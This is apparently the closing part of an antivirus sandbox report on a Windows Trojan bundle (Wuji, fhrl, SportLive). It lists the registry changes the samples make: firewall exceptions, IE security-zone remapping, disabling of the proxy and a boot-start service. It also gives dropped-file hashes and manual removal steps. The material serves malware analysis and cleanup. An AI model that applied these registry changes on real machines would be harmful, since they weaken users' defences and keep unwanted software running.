[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"BitNames" = " NAP_TRACE_BASE NAP_TRACE_NETSH"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"Guid" = "710adbf0-ce88-40b4-a50d-231ada6593f0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"Guid" = "b0278a28-76f1-4e15-b1df-14b209a12613"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A8 AE 46 36 24 60 B5 26 DD 0F 6F BD B3 1B E2 A6"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\Wuji]
"Wuji.exe" = "%Program Files%\Wuji\Wuji.exe:*:Enabled:WJ"

The process netsh.exe:628 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"BitNames" = " NAP_TRACE_BASE NAP_TRACE_NETSH"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"Guid" = "710adbf0-ce88-40b4-a50d-231ada6593f0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"Guid" = "b0278a28-76f1-4e15-b1df-14b209a12613"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F5 44 67 5F 5E 3E AE 95 10 EB DA BE 33 C1 CB 2B"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\Wuji]
"update.exe" = "%Program Files%\Wuji\update.exe:*:Enabled:WJU"

The process SportLive.exe:908 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\System\CurrentControlSet\Services\sougop]
"HDiskNum" = "00000000000000000001"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\System\CurrentControlSet\Services\sougop]
"Type" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Services\sougop]
"ErrorControl" = "0"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "SportLive.exe"

[HKLM\System\CurrentControlSet\Services\sougop]
"StFlag" = "200"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\System\CurrentControlSet\Services\sougop]
"ImagePath" = "\??\%Program Files%\TogouInputin\Togoupplib.dat"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1400392493"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DC 73 BA 77 D6 3D E1 C8 87 D6 84 32 D0 33 6F 0A"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\System\CurrentControlSet\Services\sougop]
"qid" = "165"
"InstFlag" = "1"
"DisplayName" = "Togoupplib"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The following service will be launched automatically at system boot up:

[HKLM\System\CurrentControlSet\Services\sougop]
"Start" = "2"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process MsiExec.exe:1760 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "25 37 FA 3B 16 EA 71 14 EB 9A 16 E8 A9 6A C9 BF"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process %original file name%.exe:1832 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0F FB DB 99 98 F2 8C E4 0F 5A DC 54 52 63 F7 18"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process oemfhsli.exe:628 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\FhRl]
"Path" = "%Program Files%\fhrl"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\FhRl]
"Exit" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\fhrl]
"FhCalendar.exe" = "TODO: "

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9C 16 2C 5F 74 64 B4 AC E0 3E CF 48 61 45 D7 F5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

MD5 File path
4fd79c74d5e8ccc8b11a1d7bc1a0ef94c:\Documents and Settings\All Users\Documents\fhrl_6_12001.exe
e1bc857849dcf7a928dbf96dd364060fc:\Program Files\Common Files\Install\fhrlsli\oemfhsli.exe
da61211302dbc86ced4738aff7c7868bc:\Program Files\fhrl\DuiLib_u.dll
911d9454d22938b77368a6da6c413313c:\Program Files\fhrl\FMDLL.dll
1854bd1de533fd48ece92216fce57ea6c:\Program Files\fhrl\FMDLL32.dll
ad962279c742cb5f2e32640d160e246cc:\Program Files\fhrl\FMTest.exe
97fea0e5059a5bde0cd59a3294ff3bdec:\Program Files\fhrl\FhCalendar.exe
a570c326ab7a433647c95b4a4669525bc:\Program Files\fhrl\Fhuninstall.exe
8d2cdf0a3c544db534735c8e83842ccec:\Program Files\fhrl\KillProc.exe
4e06c6f59cf9204c435cfa22a7abb669c:\Program Files\fhrl\Skin\Default\foembin.exe
81a05de047701a946d8a441ffd08aa1ac:\Program Files\fhrl\Update.exe
7c9de379baab0801961a73377a379f14c:\Program Files\fhrl\uninst.exe
349bf98a0025a50bf8e82158a62faeaac:\fhsli_6_12001.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

Removals

Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.

Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    Wuji.exe:568
    FhCalendar.exe:452
    wujiime.exe:464
    MSIB.tmp:916
    xxdd_165.exe:452
    updroots.exe:1016
    114gglm_016.exe:488
    Update.exe:444
    fhrl_6_12001.exe:320
    fhsli_6_12001.exe:1852
    netsh.exe:436
    netsh.exe:628
    SportLive.exe:908
    MsiExec.exe:1760
    oemfhsli.exe:628

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\fixad[1].htm (1737 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\GetHoliday[1].ashx (876 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\SendClickData[1].ashx (13 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1YHYF09\picchange[1].css (584 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1YHYF09\sogou_icon_short[1].png (1421 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@sogou[2].txt (977 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AVSTIBOT\qi[1].htm (162 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1YHYF09\picchange[1].js (908 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MRYNK3CL\c[1].js (376 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MRYNK3CL\82ea18df-b4ae-4b17-b1ab-46cba4b98343[1].jpg (19946 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\CAH4OJPH.htm (2844 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@sogou[1].txt (1403 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\GetConfig[1].ashx (330 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AVSTIBOT\pixel[1].htm (6 bytes)
    %Program Files%\fhrl\note.ini (991 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AVSTIBOT\CAQJWRVK.htm (1684 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1YHYF09\924aed3e-a026-4cc3-996e-72927d75dda5[1].jpg (7278 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AVSTIBOT\jquery-1.3.2.min[1].js (36827 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\qi[1].htm (162 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\GetWeather[1].ashx (13 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MRYNK3CL\c[2].js (421 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\qi[2].htm (162 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\CAKPO1SZ.htm (3738 bytes)
    %Documents and Settings%\%current user%\Cookies\index.dat (1952 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MRYNK3CL\48aaf3d6-f95f-4921-8a68-2606aed69a12[1].jpg (13306 bytes)
    %Program Files%\Wuji\Wuji.exe (7209 bytes)
    %Program Files%\Wuji\update.exe (7451 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\无极输入法\无极输入法.lnk (638 bytes)
    %Program Files%\Wuji\Wuji.dat (1945 bytes)
    %Program Files%\Wuji\uninst.exe (3685 bytes)
    %Documents and Settings%\%current user%\Desktop\无极输入法.lnk (626 bytes)
    %Program Files%\Wuji\Wuji.dll (2422 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\无极输入法\卸载无极输入法.lnk (479 bytes)
    %System%\catsrvuz.dll (53 bytes)
    %Program Files%\Wuji\Show.dat (5 bytes)
    %Program Files%\xxdd\Liveconfig.ini (22 bytes)
    %Program Files%\xxdd\xxdd.msi (146581 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\wujiime.exe (2105 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\version[1].txt (72 bytes)
    %Program Files%\fhrl\Update.log (402 bytes)
    %Program Files%\fhrl\fhUp\Update\version.ini (72 bytes)
    %Program Files%\fhrl\Skin\test\btn_push.png (263 bytes)
    %Program Files%\fhrl\Skin\test\clock_bk.png (2 bytes)
    %Program Files%\fhrl\Skin\test\²Ëµ¥bk.png (1 bytes)
    %Program Files%\fhrl\Skin\test\È·ÈÏ°´Å¥2̬.png (1 bytes)
    %Program Files%\fhrl\Skin\test\ÀͶ¯½Ú.png (1 bytes)
    %Program Files%\fhrl\Skin\test\closetip_hov.png (4 bytes)
    %Program Files%\fhrl\Skin\test\xpopweb.xml (2 bytes)
    %Program Files%\fhrl\Skin\test\jsq_del_push.png (1 bytes)
    %Program Files%\fhrl\Skin\test\xhlwnd.xml (2 bytes)
    %Program Files%\fhrl\Skin\test\¹úÇì½Ú.png (508 bytes)
    %Program Files%\fhrl\Skin\test\equal_push.png (1 bytes)
    %Program Files%\fhrl\Skin\test\city_hov.png (1 bytes)
    %Program Files%\fhrl\Skin\test\button_hover.png (792 bytes)
    %Program Files%\fhrl\Skin\test\finish_push.png (417 bytes)
    %Program Files%\fhrl\Skin\test\mini_bk.png (14 bytes)
